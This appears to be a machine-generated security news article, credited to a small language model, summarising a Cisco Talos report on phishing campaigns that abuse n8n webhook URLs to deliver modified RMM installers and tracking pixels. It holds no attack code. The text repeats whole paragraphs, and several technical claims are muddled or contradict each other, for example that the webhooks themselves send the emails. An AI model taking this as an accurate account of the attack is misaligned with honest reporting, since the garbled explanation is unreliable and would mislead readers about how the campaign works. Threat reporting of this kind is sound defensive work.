Ethical Hacking News
A recent report by Cisco Talos has revealed that threat actors have been abusing the n8n workflow automation platform since October 2025 to deliver malicious payloads via phishing emails. The exploit takes advantage of the platform's URL-exposed webhooks, which have been used in phishing attacks with alarming frequency.
The abuse of this vulnerability allows threat actors to bypass traditional security filters and turn productivity tools into delivery vehicles for persistent remote access. According to Cisco Talos, the volume of email messages containing these URLs was about 686% higher than in January 2025, indicating that the threat actors have been taking advantage of this vulnerability with alarming frequency.
As cybersecurity continues to evolve with low-code automation, it is crucial to recognize vulnerabilities like this one before they are exploited on a large scale. This highlights the need for security teams to ensure that these platforms and tools remain assets rather than liabilities.
Threat actors have successfully weaponized the n8n workflow automation platform for phishing campaigns and delivering malicious payloads. N8n is vulnerable to exploitation due to URL-exposed webhooks that can be abused in phishing attacks. The threat actors use these webhooks to send emails with malicious payloads or tracking pixels, which are delivered when clicked. The attack aims to establish persistence and bypass traditional security filters for persistent remote access.
Threat actors have successfully weaponized the n8n workflow automation platform to facilitate sophisticated phishing campaigns and deliver malicious payloads or fingerprint devices via automated emails. According to a recent report by Cisco Talos, threat actors have been exploiting the n8n platform since October 2025 to bypass traditional security filters and turn productivity tools into delivery vehicles for persistent remote access.
N8n is a popular artificial intelligence (AI) workflow automation platform that allows users to connect various web applications, APIs, and AI model services to sync data, build agentic systems, and run repetitive rule-based tasks. Users can register for a developer account at no extra cost to avail a managed cloud-hosted service and run automation workflows without having to set up their own infrastructure.
The platform supports the ability to create webhooks to receive data from apps and services when certain events are triggered. This makes it possible to initiate a workflow after receiving certain data. The data is sent via a unique webhook URL, which is exposed on the *.app.n8n[.]cloud subdomain.
Threat actors have been abusing these URL-exposed webhooks in phishing attacks as far back as October 2025. They are using the same *.app.n8n[.]cloud subdomain to send emails that appear to be legitimate, but actually contain malicious payloads or tracking pixels that can identify victims' email addresses.
When a user clicks on the link and opens the email, their browser acts as the receiving application, processing the output as a web page. The threat actors are using this vulnerability to deliver executable files or MSI installers that serve as conduits for modified versions of legitimate Remote Monitoring and Management (RMM) tools like Datto and ITarian Endpoint Management.
The end goal of the attack is to establish persistence by establishing a connection to a command-and-control (C2) server. The threat actors are using this technique to bypass traditional security filters and turn productivity tools into delivery vehicles for persistent remote access.
According to Cisco Talos, it's these URL-exposed webhooks that have been abused in phishing attacks as far back as October 2025. This makes it possible for threat actors to propagate malware while maintaining a veneer of legitimacy by giving the impression that they are originating from a trusted domain.
The volume of email messages containing these URLs in March 2026 was about 686% higher than in January 2025, indicating that the threat actors have been taking advantage of this vulnerability with alarming frequency. The campaign observed by Talos included emails that claimed to be shared documents and embedded n8n-hosted webhook links that triggered a CAPTCHA upon completion.
The CAPTCHA was used to activate the download of a malicious payload from an external host, which appeared to come from the n8n domain due to its encapsulation within JavaScript. This technique is not only sophisticated but also demonstrates the flexibility and ease of integration of the n8n platform for malicious purposes.
In conclusion, the exploitation of the n8n workflow automation platform for phishing campaigns and delivering malicious payloads highlights the importance of security teams ensuring that these platforms and tools remain assets rather than liabilities. As cybersecurity continues to evolve with low-code automation, it is crucial to recognize vulnerabilities like this one before they are exploited on a large scale.
Related Information:
https://www.ethicalhackingnews.com/articles/N8n-Workflow-Automation-Platform-Compromised-for-Malicious-Phishing-Campaigns-ehn.shtml
https://thehackernews.com/2026/04/n8n-webhooks-abused-since-october-2025.html
https://blog.talosintelligence.com/the-n8n-n8mare/
Published: Wed Apr 15 14:09:59 2026 by llama3.2 3B Q4_K_M
